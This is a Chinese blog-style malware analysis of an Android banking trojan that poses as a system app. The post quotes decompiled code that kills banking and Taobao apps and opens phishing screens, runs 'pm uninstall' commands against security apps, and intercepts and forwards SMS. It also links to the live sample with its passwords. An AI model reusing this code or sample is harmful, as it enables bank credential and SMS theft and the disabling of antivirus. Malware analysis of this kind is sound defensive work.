android病毒“银行悍匪”独家分析

(HostsAppend)Hosts文件编辑工具1.0免费版

类型：文件处理大小：209KB语言：中文评分：7.0
标签：

立即下载

一、 病毒样本基本信息

FileName: b5910a432d2b866e1028f31874edb32f .apk
File MD5: b5910a432d2b866e1028f31874edb32f

SHA1:0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1

File Size: 829006 Byte

Package：langthing.nend

Download：http://yunpan.cn/Q4qHuRLaNivtd 访问密码 3a90 解压密码：52pojie

// 该病毒首先伪装成系统程序防止卸载；然后试着去卸载安全软件；监测各种银行应用；对需要拦截短信的关键字进行了加密，增加了分析的难度；没有MAIN和LAUNCHER组件,安装后没有图标，防止用户察觉到安装了应用

二、 病毒代码分析

查看AndroidManifest.xml配置文件，可以发现赋予了病毒非常多的权限，且是高危的权限，例如发送短信、拨打电话、读取日志文件、重启应用程序等等，且没有MAIN和LAUNCHER组件

<manifest android:versionCode="1" android:versionName="1.1" package="langthing.nend"

xmlns:android="http://schemas.android.com/apk/res/android">

<uses-permission android:name="android.permission.RECEIVE_SMS" /> //接收短信

<uses-permission android:name="android.permission.SEND_SMS" /> //发送短信

<uses-permission android:name="android.permission.READ_SMS" /> //读取短息

<uses-permission android:name="android.permission.WRITE_SMS" /> //编辑短信

<uses-permission android:name="android.permission.SEND_SMS" />

<uses-permission android:name="android.permission.READ_CONTACTS" /> //读取通讯录

<uses-permission android:name="android.permission.WRITE_SETTINGS" /> //读取系统设置的数据库权限

<uses-permission android:name="android.permission.READ_LOGS" /> //读取日志文件

<uses-permission android:name="android.permission.WRITE_CONTACTS" />//编辑通讯录联系人

<uses-permission android:name="android.permission.READ_PHONE_STATE" />//读取电话状态

<uses-permission android:name="android.permission.CALL_PHONE" /> //拨打电话

<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />//接收开机信息

<uses-permission android:name="android.permission.GET_TASKS" /> //获取运行程序信息

<uses-permission android:name="android.permission.RESTART_PACKAGES" />//重启应用程序

查看AndroidManifest.xml配置文件，可以发现当手机接收到TReceiver、eviceAdminReceiver、Alarmreceiver等组件时就会启动程序

receiver android:name=".TReceiver">

<intent-filter android:priority="2147483647">

</intent-filter>

</receiver>

<intent-filter>

</intent-filter>

</receiver>

<intent-filter>

</intent-filter>

</receiver>

<intent-filter>

</intent-filter>

恶意注入代码的代码树如下：

当程序安装后，会伪装成系统程序，防止卸载。如图：

查看langthing.nend.main伪装成系统代码如下：

private void b()

{

Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");

localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.c);

localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "------ android ------"); // 伪装成系统应用

startActivityForResult(localIntent, 1);

}

当应用监测到银行客户端启动时，就会终止个银行进程，并为工商银行、淘宝等定制了高仿真“钓鱼界面”

private void e()

{

ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity;

ActivityManager localActivityManager = (ActivityManager)getSystemService("activity");

String str = localComponentName.getClassName();

if ((str.contains("gs.gs")) || (str.contains("js.js")) || (str.contains("jt.jt")) || (str.contains("tb.tb")) || (str.contains("dz.dz")))

{

if (a(getApplicationContext(), "com.icbc"))

localActivityManager.restartPackage("com.icbc");

if (a(getApplicationContext(), "com.chinamworld.main"))

localActivityManager.restartPackage("com.chinamworld.main");

if (a(getApplicationContext(), "com.bankcomm"))

localActivityManager.restartPackage("com.bankcomm");

if (a(getApplicationContext(), "com.taobao.taobao"))

localActivityManager.restartPackage("com.taobao.taobao");

if (a(getApplicationContext(), "com.android.bankabc"))

localActivityManager.restartPackage("com.android.bankabc");

if (a(getApplicationContext(), "cmb.pb"))

localActivityManager.restartPackage("cmb.pb");

if (a(getApplicationContext(), "com.rytong.bankgdb"))

localActivityManager.restartPackage("com.rytong.bankgdb");

if (a(getApplicationContext(), "com.cib.bankcib"))

localActivityManager.restartPackage("com.cib.bankcib");

if (a(getApplicationContext(), "com.rytong.bankps"))

localActivityManager.restartPackage("com.rytong.bankps");

if (a(getApplicationContext(), "cn.com.njcb.android.mobilebank"))

localActivityManager.restartPackage("cn.com.njcb.android.mobilebank");

if (a(getApplicationContext(), "com.ecitic.bank.mobile"))

localActivityManager.restartPackage("com.ecitic.bank.mobile");

if (a(getApplicationContext(), "com.cebbank.bankebb"))

localActivityManager.restartPackage("com.cebbank.bankebb");

if (a(getApplicationContext(), "cn.com.cmbc.mbank"))

localActivityManager.restartPackage("cn.com.cmbc.mbank");

if (a(getApplicationContext(), "cn.com.spdb.mobilebank.per"))

localActivityManager.restartPackage("cn.com.spdb.mobilebank.per");

if (a(getApplicationContext(), "com.pingan.pabank.activity"))

localActivityManager.restartPackage("com.pingan.pabank.activity");

if (a(getApplicationContext(), "com.gzrcb.mobilebank"))

localActivityManager.restartPackage("com.gzrcb.mobilebank");

if (a(getApplicationContext(), "cn.com.cqb.mobilebank.per"))

localActivityManager.restartPackage("cn.com.cqb.mobilebank.per");

if (a(getApplicationContext(), "com.chinamworld.bocmbci"))

localActivityManager.restartPackage("com.chinamworld.bocmbci");

if (a(getApplicationContext(), "com.rytong.app.bankhx"))

localActivityManager.restartPackage("com.rytong.app.bankhx");

if (a(getApplicationContext(), "com.csii.huzhou.mobilebank"))

localActivityManager.restartPackage("com.csii.huzhou.mobilebank");

if (a(getApplicationContext(), "cn.com.shbank.mper"))

localActivityManager.restartPackage("cn.com.shbank.mper");

if (a(getApplicationContext(), "com.rytong.bankqd"))

localActivityManager.restartPackage("com.rytong.bankqd");

if (a(getApplicationContext(), "com.tlbank"))

localActivityManager.restartPackage("com.tlbank");

if (a(getApplicationContext(), "com.sookin.scyh"))

localActivityManager.restartPackage("com.sookin.scyh");

if (a(getApplicationContext(), "cn.com.hzb.mobilebank.per"))

localActivityManager.restartPackage("cn.com.hzb.mobilebank.per");

if (a(getApplicationContext(), "com.chinamworld.klb"))

localActivityManager.restartPackage("com.chinamworld.klb");

}

if (str.contains("icbc"))

{

Cursor localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null);

if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0))

{

localActivityManager.restartPackage("com.icbc");

new Intent("android.intent.action.MAIN");

Intent localIntent53 = new Intent("android.intent.action.MAIN");

localIntent53.setFlags(268435456);

localIntent53.addCategory("android.intent.category.HOME");

startActivity(localIntent53);

Intent localIntent54 = new Intent(getApplicationContext(), gs.class);

localIntent54.setFlags(268435456);

startActivity(localIntent54);

}

if (str.contains("com.chinamworld.main"))

{

Cursor localCursor26 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "js" }, null, null, null);

if ((localCursor26.moveToFirst()) && (localCursor26.getInt(localCursor26.getColumnIndex("jilu")) == 0))

{

localActivityManager.restartPackage("com.chinamworld.main");

new Intent("android.intent.action.MAIN");

Intent localIntent51 = new Intent("android.intent.action.MAIN");

localIntent51.setFlags(268435456);

localIntent51.addCategory("android.intent.category.HOME");

startActivity(localIntent51);

Intent localIntent52 = new Intent(getApplicationContext(), js.class);

localIntent52.setFlags(268435456);

startActivity(localIntent52);

}

if (str.contains("bankcomm"))

{

Cursor localCursor25 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "jt" }, null, null, null);

if ((localCursor25.moveToFirst()) && (localCursor25.getInt(localCursor25.getColumnIndex("jilu")) == 0))

{

localActivityManager.restartPackage("com.bankcomm");

new Intent("android.intent.action.MAIN");

Intent localIntent49 = new Intent("android.intent.action.MAIN");

localIntent49.setFlags(268435456);

localIntent49.addCategory("android.intent.category.HOME");

startActivity(localIntent49);

Intent localIntent50 = new Intent(getApplicationContext(), jt.class);

localIntent50.setFlags(268435456);

startActivity(localIntent50);

}

if (str.contains("taobao"))

{

Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null);

if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0))

{

localActivityManager.restartPackage("com.taobao.taobao");

new Intent("android.intent.action.MAIN");

Intent localIntent47 = new Intent("android.intent.action.MAIN");

localIntent47.setFlags(268435456);

localIntent47.addCategory("android.intent.category.HOME");

startActivity(localIntent47);

Intent localIntent48 = new Intent(getApplicationContext(), tb.class);

localIntent48.setFlags(268435456);

startActivity(localIntent48);

}

// 终止各银行进程

查找安全软件并卸载安全软件

for (g = "Already root"; ; g = "NOroot")

{

this.C = 5;

this.E = 5;

this.B = new String[this.C];

this.D = new String[this.E];

this.B[0] = "pm uninstall com.qihoo360.mobilesafe"; //卸载360、腾讯、金山等相关的安全软件

this.B[1] = "pm uninstall com.tencent.qqpimsecure";

this.B[2] = "pm uninstall com.ijinshan.mguard";

this.B[3] = "pm uninstall com.ijinshan.duba";

this.B[4] = "pm uninstall com.anguanjia.safe";

this.D[0] = "com.qihoo360.mobilesafe";

this.D[1] = "com.tencent.qqpimsecure";

this.D[2] = "com.ijinshan.mguard";

this.D[3] = "com.ijinshan.duba";

this.D[4] = "com.anguanjia.safe";

this.s = new o();

拦截相关短信：

f (i5 == 1)

if ((server.f == 0) && (server.a != i3))

{

server.a(this.a, 1);

server.b(this.a, i3);

str4 = "接收";

server.a(this.a, new o());

String str5 = server.d(this.a).a(this.a.getApplicationContext());

server.a(this.a, new n());

server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5);

localStringBuilder.append("[ ");

localStringBuilder.append(str1 + ", ");

localStringBuilder.append(i4 + ", ");

localStringBuilder.append(str2 + ", ");

localStringBuilder.append(str3 + ", ");

localStringBuilder.append(str4);

localStringBuilder.append(" ]\n\n");

if (!localCursor1.isClosed())

localCursor1.close();

}

while (true)

{

localStringBuilder.append("getSmsInPhone has executed!");

super.onChange(paramBoolean);

return;

server.f = 0;

break;

if (i5 != 2)

break;

if (server.b == i3)

break label760;

Cursor localCursor2 = server.c.a("send", null, null, null, null, null, "_id ASC");

if (localCursor2.moveToFirst())

{

localCursor2.getColumnIndex("_id");

int i6 = localCursor2.getColumnIndex("sSend");

server.a(this.a, localCursor2.getString(i6));

while (localCursor2.moveToNext());

}

localCursor2.close();

if (server.h(this.a).equals("1"))

{

server.a(this.a, new o());

server.a(this.a, new n());

String str6 = server.d(this.a).a(this.a.getApplicationContext());

server.a(this.a, str2 + ";" + str1, str6);

}

server.b = i3;

str4 = "发送";

break;

localStringBuilder.append("no result!");

}

catch (SQLiteException localSQLiteException)

{

while (true)

{

continue;

label760: String str4 = "null";

}

解密密钥：

public void a()

{

try

{

InputStream localInputStream = getAssets().open("unhi.db"); // 密钥

FileOutputStream localFileOutputStream = new FileOutputStream(this.q + "unhi.db");

byte[] arrayOfByte = new byte[1024];

while (true)

{

int i1 = localInputStream.read(arrayOfByte);

if (i1 <= 0)

{

localFileOutputStream.flush();

localFileOutputStream.close();

localInputStream.close();

return;

}

localFileOutputStream.write(arrayOfByte, 0, i1);

}

catch (Exception localException)

{

}

public void a(String paramString)

{

if (!new File(paramString).exists())

a();

}

public void c()

{

new l(this).start();

}

public IBinder onBind(Intent paramIntent)

{

return null;

}

public void onCreate()

{

this.u = new e();

IntentFilter localIntentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");

localIntentFilter.setPriority(2147483647);

registerReceiver(this.u, localIntentFilter);

p = (ActivityManager)getSystemService("activity");

this.F = 0;

this.j = false;

b(this.s.a(getApplicationContext()), "201305:" + g + ";ver:" + Build.VERSION.RELEASE + ";Model:" + Build.MODEL);

this.q = (getApplicationContext().getFilesDir().getAbsolutePath() + "/");

a(this.q + "unhi.db");

c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + "/unhi.db", null, 1);

m localm = new m(this, new Handler());

getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localm);

Intent localIntent = new Intent(getApplicationContext(), log.class);

localIntent.setFlags(268435456);

startService(localIntent);

三、总结

该病毒尝试着去卸载安全软件；采用了加密技术，增加了分析难度；并隐藏运行界面，防止用户察觉。可以看出移动安全问题越演越烈，且手段越来越高明，增加了分析难度。

// 由于本人对于密码学方面还没有Hello World的水平，所以无法解密相关信息，水平有限。

android病毒“银行悍匪”独家分析

相关文章

相关评论

阅读本文后您有什么感想? 已有23人给出评价!

热门评论

最新评论

发表评论查看所有评论(0)

推荐文章

相关下载

最新文章

android病毒“银行悍匪”独家分析

相关文章

相关评论

阅读本文后您有什么感想? 已有23人给出评价!

热门评论

最新评论

发表评论 查看所有评论(0)

推荐文章

相关下载

最新文章

发表评论查看所有评论(0)